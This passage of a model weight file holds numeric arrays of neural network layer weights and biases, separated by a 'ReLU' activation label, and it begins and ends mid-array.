0.7866, -0.1581, -0.802, -0.491, 0.05936, -1.185, -0.1536, -2.111, -0.1338, 0.3464, 0.436, 0.508, -0.2393, 0.4348, 0.08984, 0.02298], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.223, 1.134, -1.596, -0.2898, -0.3262, 0.03958, -0.2507, 0.179, -0.4917, 0.2153, -0.2372, -0.824, -0.31, 0.152, -0.529, 0.03683, 0.3918, -0.3853, 0.1882, 0.3074, -0.2876, -0.11755, 0.1924, -0.003681, 0.0385, -0.3662, 0.3503, 0.5254, 0.4885, 0.779, 0.057, -0.2324, 2.021, -0.3455, 2.531, 0.4531, 0.0901, -0.2854, -1.337, 0.9746, 0.1968, 0.06152, 0.3782, 0.1755, 0.03598, -0.1846, -0.8555, -0.2047, 0.1272, 0.569], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.01311, -0.01361, 0.00671, 0.002888, -0.0564, -0.02277, -0.005074, -0.03192, 0.01223, -0.04108, 0.02997, -0.0097, 0.04086, 0.0312, -0.0382, 0.04315, -0.01218, -0.00472, 0.01324, 0.03632, 0.002317, -0.02597, -0.05222, -0.0136, -0.02336, -0.0276, -0.00966, 0.005966, 0.00491, 0.003069, -0.01878, 0.0202, -0.01762, -0.033, -0.02649, -0.03326, 0.0346, 0.003956, -0.04193, 0.01791, -0.03232, 0.03174, -0.05206, -0.05325, 0.0001295, -0.02391, -0.004417, -0.03204, 0.011116, 0.008766], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.592, -0.3884, -0.1678, -0.0655, 0.183, 0.698, -0.3647, 0.771, -0.534, 0.539, -0.0887, -0.1632, 1.151, -0.03192, -0.09106, -0.00798, 0.2546, 0.3015, 0.632, 0.7334, 0.9917, -0.286, -0.1753, -0.03195, -0.02014, -0.1527, -0.288, -0.637, -1.514, 0.2357, -0.2374, 0.586, -1.125, 0.5737, 0.1517, -0.357, -2.467, -0.1937, 0.0533, -1.337, -0.2456, -0.3247, -0.07324, 0.02368, -0.04834, -2.475, -2.1, -0.02179, 0.11053, 0.1755], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.984, 0.9106, -0.06003, 0.3533, -1.19, 0.08, -0.7715, -0.5244, 0.3088, 0.7847, 0.3833, -0.945, 0.799, -0.3813, 1.482, -0.001999, -1.095, -0.342, -0.8804, 0.1289, 0.5537, -0.653, -0.4495, 0.006344, -0.015114, 0.348, 0.2, 0.00622, 0.2084, -0.519, -0.0797, -0.5625, -0.0155, -0.00979, -0.5376, -0.5776, 0.372, -0.672, -0.2625, -0.7188, 0.091, -0.2134, 0.0982, -0.3584, 0.7183, -3.219, 0.6636, -0.4282, -0.784, -0.3499], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.846, 0.0521, -0.7188, 0.00411, -0.2334, 0.2783, -0.1953, 0.1158, -0.1621, 0.1744, 0.649, 0.3489, -0.4849, -0.569, -0.625, -0.04797, 1.114, -0.1593, 0.5776, -0.08746, -0.02403, -0.1058, 0.1597, 0.00694, -0.001555, 0.3938, -0.0768, -1.007, -0.4622, 0.004616, 0.336, -0.2001, 0.4067, -0.01878, 0.303, -0.5874, 0.3247, 0.1593, -0.01173, -0.3599, 0.1318, 0.12366, -0.09753, -0.2676, 0.412, 0.4204, 0.4587, 0.315, 0.0391, 0.684], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.111, 0.02592, 0.3792, 0.217, -0.4417, -0.1416, 0.324, -0.1509, -0.01467, 0.769, -0.07526, 0.778, 0.10187, 0.06415, -0.02304, 0.0259, 0.889, -0.01772, 0.4146, -0.2385, -0.1246, -0.0326, -0.2418, -0.02151, 0.02054, 0.3252, 0.3245, -0.01877, -1.649, 0.0956, 0.3037, -0.2935, -1.104, 0.5156, -0.923, -0.205, 0.315, -0.3108, -0.07214, 0.849, 0.7305, 0.8936, 0.565, 0.10614, -0.11676, -0.8145, -0.2617, -0.5234, -1.16, -0.1366], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -1.017, -4.055, -0.263, -0.572, 0.1775, 0.756, 0.556, -0.772, -2.693, -0.10046, -4.395, -0.1504, 0.8115, -0.0733, 0.936, 0.03305, 0.2279, -1.1455, -0.5127, 0.06555, 0.04193, 0.2678, 0.02539, 0.02536, 0.01563, 0.2527, -0.02927, 0.001789, 1.974, 0.4001, -0.233, -0.3088, 1.801, 0.1512, -1.555, -0.882, 1.053, 0.3123, -0.09796, 2.164, -0.2185, 0.2861, 1.054, -0.1609, 0.0529, -0.668, -0.6157, 0.2324, -0.0828, 0.0254], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.01701, 0.02853, -0.04102, -0.01299, -0.001672, -0.02386, -0.03268, -0.04907, -0.04428, -0.0324, -0.00787, -0.003067, -0.05087, 0.00864, -0.03732, -0.00416, -0.0568, -0.00934, -0.06113, 0.01079, 0.00421, 0.02187, -0.04932, 0.03067, -0.00762, -0.02794, -0.01071, 0.0008273, -0.02737, -0.0476, 0.02185, -0.03497, 0.003864, -0.01281, -0.04025, 0.00832, 0.01723, -0.0008526, -0.001273, -0.002316, 0.0368, 0.01953, 0.02718, -0.04434, 0.01187, -0.01999, -0.0356, -0.00439, 0.01326, 0.010925], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0501, 0.601, -0.4858, 0.3984, -0.722, -0.7656, -0.1956, -0.2097, -0.5947, 0.293, -0.2004, -0.6772, -0.595, 0.1312, -0.1884, -0.01756, -0.6343, -0.00901, -0.0629, -0.5386, -0.1615, 0.10016, 0.576, 0.05984, -0.001458, -0.7397, 0.5376, 0.3652, -0.445, 0.4773, 0.687, 0.1129, 1.293, -0.4424, -0.2349, -0.4463, -0.106, -0.4622, 0.719, -0.89, -0.296, -0.1893, 0.4456, 0.02519, 0.0127, 0.6567, -0.327, -1.444, 0.3088, 0.578], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.1015, -1.333, -0.4768, -0.6074, 1.162, 0.3662, -0.4783, -1.545, 0.0948, -0.3767, 0.3867, -0.809, 0.068, -1.289, -0.6465, -0.014915, -0.4475, 0.0982, -0.3413, -0.03525, -0.5923, -0.722, 0.2996, -0.03091, 0.00943, 0.3127, -0.645, 0.5483, 3.865, -0.2168, -0.9526, -0.03073, -0.2678, 0.814, 0.568, 2.568, -1.275, 1.116, 0.0364, 1.108, 1.012, 1.35, -2.27, -0.3445, -0.1108, -0.573, 0.875, -2.963, -0.6367, 0.351], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.11884, -0.712, -0.484, -0.711, 0.2242, 0.5044, -1.071, 0.1448, 0.442, -0.432, 0.336, -0.4387, 0.0901, 0.383, 0.5205, -0.02791, 0.4722, 0.2766, 0.5684, 0.06006, -0.4216, 0.2112, -0.5073, 0.02367, -0.002958, -0.05112, 0.8022, 0.06146, 2.994, -0.1592, -0.5215, 0.608, 0.368, -0.0924, -1.003, -0.297, 0.1687, 0.1744, 0.3608, -0.7583, -0.745, -0.4688, 0.1473, -0.7314, 0.0857, -3.418, -1.042, -1.06, -0.2281, 0.3542], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.02312, -0.01912, 0.013115, 0.0142, -0.02498, -0.01662, -0.00534, -0.05475, -0.01198, -0.0007586, 0.02611, -0.03128, -0.04874, 0.02045, 0.02309, -0.0267, 0.02768, -0.0513, 0.02632, 0.012375, -0.04977, -0.02419, 0.02316, -0.015335, 0.004887, -0.011, -0.01646, -0.0445, -0.02513, -0.02544, 0.03635, -0.000539, 0.005127, -0.01866, 0.03014, -0.04703, -0.02531, -0.00574, 0.01267, -0.005993, -0.05048, -0.02353, 0.00216, 0.01884, -0.00475, -0.0495, -0.0431, 0.00986, -0.010635, -0.05447], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.00899, -0.00992, -0.0654, -0.00634, 0.0315, -0.003717, 0.02011, 0.02623, -0.05954, 0.01477, 0.00936, -0.04532, -0.0513, 0.0288, -0.03494, 0.02727, -0.04446, 0.01509, -0.01158, 0.01062, -0.0565, -0.01997, -0.018, 0.03265, 0.000317, -0.04437, 0.04187, -0.02005, 0.02148, -0.001552, -0.04218, 0.0058, 0.01019, -0.005627, -0.03656, -0.001269, -0.01115, -0.02415, 0.02156, -0.0151, -0.0414, -0.03027, -0.01307, 0.03102, -0.049, -0.03513, 0.041, -0.04163, 0.0219, -0.025], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.4177, 0.1783, -0.1592, 0.007565, 0.3633, 0.293, -0.0006638, -0.35, -0.01898, -0.3005, -0.1312, 0.3254, -0.398, 0.2383, 0.3357, 0.001966, 0.08936, -0.06143, 0.2474, 0.1542, -0.1104, 0.4697, -0.2437, 0.02998, 0.001185, -1.405, 0.0589, 0.06854, 0.877, -0.281, -0.193, 0.2212, -0.945, 0.1736, -0.3237, -0.2205, -0.1636, 0.1719, -0.02174, -0.3699, 0.0906, -0.2612, 0.166, 0.3042, 0.1302, -0.2089, 0.1047, 0.05698, -0.4722, 0.00827], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.3528, 0.09125, -0.293, 0.4446, -0.672, 0.7144, 0.66, -0.9175, -0.1646, 0.02899, -2.848, -0.4216, -0.3855, 0.9165, -0.4832, 0.01391, -0.4038, -2.52, -0.4595, 0.1116, -0.2047, 0.1494, 0.1324, 0.0392, 0.02989, 0.9985, -0.53, -0.1819, -0.7207, -0.0584, -0.6953, -2.238, 0.2566, 0.1927, 0.3733, -0.877, 0.906, 0.656, -0.1772, 0.0885, 0.43, -0.2207, -0.0472, 0.8164, -0.000985, 0.6455, 0.00651, 0.803, 0.309, 0.2634], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.03543, 0.7573, 0.1488, 0.03293, -0.4612, 0.3086, 0.9756, 0.612, 0.373, -0.2325, 1.08, 1.475, -0.2605, -0.9194, 0.7896, -0.0006332, -0.666, 0.1877, -0.1409, 0.693, -0.08234, 1.022, -0.5234, -0.01515, -0.01643, -0.4526, 0.5107, 0.7036, 1.5, -0.596, -0.02388, -0.6587, -1.008, 0.831, 0.2966, -0.2605, -1.3125, 0.2378, -0.0084, -0.9336, -0.2472, 0.377, 0.5757, -0.5347, -0.593, 0.7764, -1.357, -1.325, -0.6514, 0.0227]]
[0.912087, -1.10685, 0.137794, -0.168459, -1.42421, 0.787138, -0.124085, 1.3736, -0.00859633, -0.651856, 0.145405, 0.0652822, -0.0841456, -0.0115158, -0.998676, 0.218436, 0.505745, -0.568693, -0.0247987, -0.133928, -0.016517, -0.942378, -0.263868, 0.76542, -0.109887, -0.82618, 0.394328, -0.447269, 0.298651, -0.237186, 0.540693, -0.715828, 0.659396, -0.286652, -0.998394, -0.0237047, -0.213427, 0.331735, -0.857676, -1.37676, -0.954094, -0.0253784, 0.0309685, -0.749332, 0.0661743, -0.0357525, -0.0224549, -0.515813, -0.634611, -0.265024, 0.912, -1.106, 0.1378, -0.1685, -1.424, 0.787, -0.1241, 1.374, -0.0086, -0.652, 0.1454, 0.0653, -0.08417, -0.01151, -0.9985, 0.2184, 0.506, -0.569, -0.0248, -0.1339, -0.01651, -0.9424, -0.264, 0.7656, -0.10986, -0.826, 0.3943, -0.4473, 0.2986, -0.2372, 0.5405, -0.716, 0.659, -0.2866, -0.9985, -0.02371, -0.2134, 0.3318, -0.858, -1.377, -0.954, -0.02538, 0.03098, -0.7495, 0.06616, -0.03577, -0.02246, -0.5156, -0.635, -0.2651]
ReLU
[[0.271949, 0.512019, 0.422585, -0.0321031, -0.206024, 0.393246, 0.804279, 0.367912, 0.0123004, 0.189081, 0.201671, 0.616549, -0.0266517, -0.0037589, 0.316717, 0.473881, -0.00959905, 0.211184, -0.0321328, 0.0180846, 0.028831, -1.79184, -0.21782, -0.413211, 0.154019, -0.284619, -0.155439, 0.472377, -0.1749, -0.416063, 0.0213886, -0.452012, 0.473652, 1.22063, -2.29487, -0.0223064, -0.260153, 0.234868, 0.241203, 0.315482, 0.276062, 0.0165337, -0.322751, -0.0661323, 0.741115, 0.0256236, 0.0124232, 0.768492, 0.64826, -0.0325234, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.246193, -0.0237456, 0.165561, -0.0853276, 0.0974237, 0.0180937, -0.0194636, 0.0045679, 0.0145314, -0.16837, 0.0931833, -0.0227176, 0.0484886, 0.00994968, 0.0680939, -0.133679, -0.14988, 0.0439148, 0.0248997, -0.118244, -0.0526062, 0.0273782, -0.0346477, 0.0558963, 0.118343, -0.26601, -0.0807286, -0.230834, -0.214336, -0.0999274, -0.206176, 0.0759019, -0.248978, 0.145935, -0.405872, -0.0223286, -0.148892, -0.0858001, -0.154383, 0.117089, -0.000781516, -0.00245355, 0.172322, -0.0640278, 0.0870513, 0.0412612, 0.0429608, 0.0144501, 0.0213466, -0.0572681, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.348064, 0.275401, -0.276797, 0.430612, 0.165869, 0.00953433, 0.0204052, -0.0595682, -0.0428368, 0.388766, -0.0413196, -0.319918, -0.647822, -0.0056935, 0.18271, -0.106225, 0.0440489, 0.734474, -0.0392018, -0.0875623, 0.0482078, 0.103628, 1.16295, 0.202931, 0.115736, -0.00846257, -0.109788, 0.557641, 0.119226, -0.0228916, 0.0106816, -0.170102, -0.440805, -0.405067, -0.169677, 0.0260662, -0.415728, -0.0105482, 0.475071, 0.148709, 0.039315, 0.00588011, 0.73053, -0.0108851, 0.0984433, -0.0157205, 0.0372195, 1.09959, -0.0187228, -0.301979, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.579094, 1.52373, -0.026886, -1.75065, -1.78209, -0.72128, 1.3038, -0.0884506, 0.0214799, 1.60637, -1.13732, -0.318843, -0.619158, -0.0249144, 1.12584, -0.364895, -1.64756, 1.93937, -0.0382276, -1.48138, 0.024982, 1.22698, -1.71283, -0.886178, 0.0978122, -0.171004, -0.247903, 0.327873, 0.967812, -0.578115, -0.760313, 0.0205029, -0.0762541, -1.49011, 3.57408, 0.00591744, -0.436708, 0.740607, 0.569299, -0.218021, 0.616508, -0.023734, 0.468529, -0.0877025, -0.909949, -0.0489067, 0.0330287, -0.786574, 0.870809, 0.943854, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.322396, -0.0713585, 0.609395, -0.580845, 0.243254, 0.198099, 1.25461, 0.0407065, 0.0349382, -0.289258, 0.379686, -0.0294219, 0.0549545, -0.0334332, -0.541847, -0.456731, -0.0618922, 0.0169075, 0.0396913, 0.325121, -0.0111307, 0.349285, -0.594415, -0.0190424, 0.00326467, 0.562036, -0.75562, -0.354659, 0.682411, 0.754096, 0.152794, 0.158089, 0.474438, 0.0986289, -3.13819, 0.030419, -0.079289, 0.370129, -0.131625, -0.0318, -0.525068, 0.0465938, 0.593939, 0.0936457, -0.229049, 0.0175572, 0.00135867, -0.488019, -0.556685, -0.401094, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.358858, 1.07785, 0.743704, 0.534735, 1.28319, 0.612087, -1.07687, -0.299037, 0.0158099, 0.866619, -0.943901, 0.17306, 0.363409, -0.00531556, 0.539324, 1.08283, -0.127382, 0.566731, -0.010557, 0.336808, -0.028703, -0.214068, 0.544311, 0.287946, 0.132668, 0.00271036, 0.140591, 0.56339, -0.304448, -0.504718, 0.329524, -0.470984, 0.285756, -0.989648, 0.103825, 0.00612824, 0.21539, 0.477639, 0.225677, 1.18505, 0.0384696, -0.0386904, 0.231029, 0.0307064, -0.685649, -0.0262519, -0.0271563, 1.90799, 0.899768, -0.162232, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [1.18861, 0.109209, 0.425834, -0.115479, 0.23461, -0.255114, 0.00538916, -0.624438, 0.0211935, -0.182278, 0.206605, 0.583968, 0.158284, 0.00188872, 0.525434, -0.0912172, 0.221657, 0.479023, 0.014828, -0.098439, -0.0409894, -0.308829, 0.195309, 0.0580535, -0.0664931, 0.137732, -0.145333, -0.145576, -0.454602, -0.21621, 0.235531, 0.0511211, 0.460514, 0.728351, -1.14555, -0.0215425, 0.0784065, 0.168373, -0.350257, 0.110489, 0.5184, -0.00664132, -0.325855, -0.0695803, -0.369236, -0.01615, 0.0014409, 0.701695, 0.199358, -0.291411, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.274289, -0.120391, -0.331651, -0.564438, -0.702278, 0.191083, 0.665742, 0.242902, 0.0130251, -0.399274, -0.459494, 0.250312, 0.0519729, 0.0218159, -0.121835, 0.3309, -0.0995712, 0.144351, 0.0349663, 0.417257, 0.0488571, 0.281239, -0.531963, 0.374611, 0.131153, 0.117653, -0.00273073, 0.922583, 0.0957064, 0.168717, 0.077685, 0.242904, -0.415533, -0.614069, 0.494131, 0.0432462, 0.277914, 0.167785, -0.104656, -0.0419871, -0.97231, -0.0354682, -0.306967, 0.162947, 0.354106, -0.0174505, 0.0139338, -1.87703, -0.589777, 0.256253, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.326116, 1.38173, 0.162859, -1.00328, -2.56311, -0.164605, 1.75882, 0.120376, -0.0406069, -0.873924, -0.426187, 0.48344, -0.0960247, -0.0123661, -0.285594, 0.178636, 0.2037, -0.243988, 0.0324751, 0.536628, -0.00232481, -0.525837, -0.100397, -0.189083, 0.138317, 0.593191, 0.237433, -0.512329, 0.106529, -0.236459, -0.337619, -0.349448, -1.34718, -0.875758, -1.80461, -0.0485087, 0.276302, -0.374485, 0.166501, 0.0588986, 0.0667003, 0.0078468, -0.0627737, -0.0781425, -0.0269832, -0.0239702, -0.00941517, -0.822482, 0.0620264, -0.0829399, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.186947, 0.466458, -0.77397, 0.136826, -0.242964, 0.0426521, 0.497589, -0.28078, 0.00188819, 0.0334078, 0.115658, 0.49142, -0.0590964, -0.0468512, -1.96659, 0.0828754, -0.657453, -1.04333, 0.0253487, -0.223365, -0.0388406, -0.140886, 0.824181, 0.240997, 0.0285802, 0.270032, -0.0623165, -0.0641766, 0.0416566, -0.424149, -0.195135, -0.25654, -0.626693, 0.00560728, -1.16393, 0.0459598, -0.00786647, -0.00887003, -0.342144, 0.602044, 0.129861, 0.0255492, -0.355551, 0.00653958, 0.333029, 0.0316755, -0.0357401, 0.636095, 0.433844, 0.132161, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.18016, -1.75495, -0.558082, 